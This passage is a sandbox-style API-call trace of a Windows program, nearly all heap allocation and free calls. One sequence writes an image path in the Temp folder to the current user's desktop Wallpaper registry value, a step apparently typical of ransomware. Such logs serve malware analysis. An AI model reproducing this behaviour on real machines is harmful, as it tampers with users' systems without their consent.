(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0316.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0316.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0316.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0316.932] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0316.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0316.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0316.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0316.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0316.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0316.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0316.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0316.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0316.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0316.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0316.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0316.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0316.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0316.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0316.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0316.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0316.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0316.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0316.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0316.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0316.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0316.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0316.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0316.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0316.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0316.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0316.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0316.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0316.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0316.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0316.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0316.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0316.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0316.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0316.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0316.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0316.934] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0316.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0316.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0316.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0316.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0316.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0316.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0316.934] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0316.935] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0316.935] RegCloseKey (hKey=0x294) returned 0x0 [0316.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0316.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0316.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0316.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0316.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0316.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0316.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0316.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0316.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0316.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0316.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0316.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0316.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0316.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0316.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0316.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0316.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0316.936] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0316.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0316.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0316.936] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0316.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0316.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0316.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0316.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18f8 [0316.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0316.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0316.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0316.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0316.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0316.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0316.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0316.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0316.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0316.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0316.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0316.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0316.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0316.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0316.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0316.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0316.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0316.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0316.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0316.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0316.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0316.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0316.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0316.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0316.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0316.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0316.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0316.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0316.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0316.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0316.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0316.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0316.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0316.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0316.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0316.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0316.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0316.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0316.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0316.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0316.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0316.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0316.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0316.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0316.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0316.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0316.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0316.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0316.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0316.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0316.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0316.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0316.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0316.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0316.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0316.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0316.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0316.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0316.939] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0316.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0316.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0316.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0316.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0316.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0316.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0316.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0316.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0316.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0316.940] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0316.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0316.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0316.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0316.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0316.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0316.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0316.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0316.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0316.940] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0316.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0316.940] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0316.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0316.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0316.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0316.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0316.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0316.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0316.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0316.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0316.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0316.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0316.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0316.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0316.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0316.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0316.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0316.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0316.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0316.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0316.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0316.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0316.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0316.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0316.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0316.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0316.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0316.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0316.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0316.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0316.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0316.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0316.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0316.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0316.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0316.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0316.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0316.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0316.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0316.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0316.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0316.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0316.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0316.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0316.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0316.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0316.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0316.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0316.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0316.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0316.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0316.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0316.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0316.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0316.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0316.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0316.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0316.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0316.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0316.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0316.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0316.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0316.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0316.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0316.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0316.944] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0316.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0316.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0316.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0316.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0316.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0316.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0316.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0316.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0316.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0316.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0316.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0316.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0316.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0316.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0316.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0316.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0316.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0316.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 